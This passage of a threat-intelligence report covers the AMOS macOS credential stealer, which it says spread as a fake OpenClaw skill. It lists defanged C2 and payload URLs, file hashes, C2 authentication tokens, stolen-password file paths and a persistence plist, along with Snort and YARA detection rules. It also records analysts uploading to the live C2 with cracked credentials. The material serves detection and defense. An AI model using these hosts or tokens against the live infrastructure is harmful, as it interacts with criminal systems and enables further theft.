| Acquire Infrastructure: Domains | T1583.001 | saramoftah.com, avipstudios.com |
| Compromise Infrastructure | T1584.001 | wusetail.com (expired SaaS domain) |
Timeline
| Time (UTC) | Event |
|---|---|
| 2026-02-23 | avipstudios[.]com re-registered (backup C2) |
| 2026-02-28 14:30 | Let's Encrypt cert for saramoftah[.]com |
| 2026-02-28 15:24 | saramoftah[.]com registered |
| 2026-03-02 02:46 | v1 payload captured (578 KB) |
| 2026-03-02 ~16:00 | Payload replaced -- v2 deployed (2,881 KB) |
| 2026-03-02 16:54 | v2 payload captured |
| 2026-03-02 ~19:00 | v2 binary fully cracked |
| 2026-03-02 19:10 | C2 authentication cracked |
| 2026-03-02 19:16 | Successful upload to live C2 (HTTP 200) |
| 2026-03-02 19:45 | Operator locks down C2 (Error 1012) |
Indicators of Compromise
Network
```
# Payload delivery
saramoftah[.]com
hxxps://saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d194205e
hxxps://saramoftah[.]com/n8n/update
# Primary C2
38.244.158[.]103
hxxp://38.244.158[.]103/contact
# Backup C2
avipstudios[.]com
hxxps://avipstudios[.]com/contact
# Trojan/persistence server
wusetail[.]com
hxxps://wusetail[.]com/zxc/app.zip
hxxps://wusetail[.]com/zxc/apptwo.zip
hxxps://wusetail[.]com/zxc/kito
```
File Hashes (SHA256)
```
# v1 (self-contained stealer)
2db8a97685a7ba523efa88308a765b3b33a6370333dc1044c2b3e45be513caa6  fat binary
c0e288edacfc500309d4b5aa9d3a63024e4daeaf4d7a301184d5acc761a9b789  x86_64 slice
43aa9e588b0af8524bdde6c5e2f685c0a9085d8034e145fac37d7c7a205706fe  arm64 slice
# v2 (dropper variant)
f42e795b098e35075ed2d3601b8fe3dc60a745f4c29cb82e994cdda096a71df3  fat binary
cb6f0a7ad45a3c4669786920264ab3551dc00a5dff518696b0f08a6fc3b75c36  x86_64 slice
# Decrypted payload
33f253af4f8b6068a124dc445511486ad886142195ec88933ea28286920896d8  v2 AppleScript
```
C2 Authentication Tokens
```
# v1 credentials
user:    ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ=
BuildID: brIyWXoYkYAXOR/cnm/2l8iLv3rlv0EUdYZcPwKB5fU=
# v2 credentials (rotated)
user:    -czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw=
BuildID: iQorUGf6SNQ1EChuIzMqfvTavnAP5gPolmR43L0n2Ss=
```
SSH Fingerprints (38.244.158.103)
```
ED25519: SHA256:jhptH1+QOYbydpnl6BqPbnahYE1ZbknFDBUeJRXSK80
RSA:     SHA256:xGM9p/DWxEkjEW4Twn71ul54cq4zsbGK0s2uTjDSUF8
ECDSA:   SHA256:BVVMZBdgWgCinQc0GXoIaxF2Q6K9kV1f0BMeCRvkmno
```
Host Artifacts
```
/tmp/helper                                     # Dropped binary
/tmp/<5-digit random>/                          # Staging directory
/tmp/out.zip                                    # Exfil archive
/Users/<user>/.username                         # Build ID temp file
/Users/<user>/.pass                             # Stolen password temp file
/Users/<user>/.logged                           # Infection marker ("user10")
/Users/<user>/.agent                            # Persistence script
/Users/<user>/.mainhelper                       # Backdoor binary
/Library/LaunchDaemons/com.finder.helper.plist  # LaunchDaemon
```
Detection Signatures
Snort/Suricata:
```
alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"AMOS Stealer C2 Upload - V2 Auth";
  content:"user|3a 20|"; http_header;
  content:"-czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw="; http_header;
  content:"POST"; http_method;
  content:"/contact"; http_uri;
  sid:2026030201; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"AMOS Stealer C2 Upload - V1 Auth";
  content:"user|3a 20|"; http_header;
  content:"ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ="; http_header;
  content:"POST"; http_method;
  content:"/contact"; http_uri;
  sid:2026030202; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (
  msg:"AMOS Stealer Backdoor Download";
  content:"wusetail.com"; http_header;
  content:"/zxc/kito"; http_uri;
  sid:2026030203; rev:1;)
```
YARA:
```yara
rule OpenClaw_AMOS_Stealer {
    meta:
        description = "AMOS stealer distributed as fake OpenClaw skill"
        author = "breakglass.intelligence"
        date = "2026-03-02"
        severity = "high"
    strings:
        $v2_user = "-czeGXNGf-QeHMot5l/3CughihQWlBKVZGpvk1siAtw=" ascii
        $v2_build = "iQorUGf6SNQ1EChuIzMqfvTavnAP5gPolmR43L0n2Ss=" ascii
        $v1_user = "ImIKrsM9Gw5BAN14nf6znrLb12emIlTgC9ZLW3MgtFQ=" ascii
        $v1_build = "brIyWXoYkYAXOR/cnm/2l8iLv3rlv0EUdYZcPwKB5fU=" ascii
        $c2_ip = "38.244.158.103" ascii
        $backup_c2 = "avipstudios.com" ascii
        $payload_server = "wusetail.com" ascii
        $backdoor_path = "/zxc/kito" ascii
        $persistence = "com.finder.helper" ascii
        $phishing_dialog = "Application wants to install helper" ascii
        $password_validate = "dscl . authonly" ascii
    condition:
        any of them
}

rule AMOS_MachoStructure_Generic {
    meta:
        description = "AMOS C++ Mach-O structural indicators"
        author = "breakglass.intelligence"
        date = "2026-03-02"
    strings:
        $macho = { CF FA ED FE }
        $zsh = "/bin/zsh" ascii
        $zsh_flag = "-c" ascii
    condition:
        $macho at 0 and $zsh and $zsh_flag and
        filesize > 500KB and filesize < 5MB
}
```
TLS Certificate Serials
```
05:ff:b2:64:4f:4d:7f:be:49:28:4b:67:8d:d7:67:a4:9d:f7  (LE E8 - saramoftah.com)
00:f1:83:44:90:6a:43:c1:82:99:e4:01:1a:ad:a3:0f:d9  (Sectigo DV E36 - saramoftah.com)
```
Analysis by breakglass.intelligence | 2026-03-02
Campaign status: ACTIVE at time of publication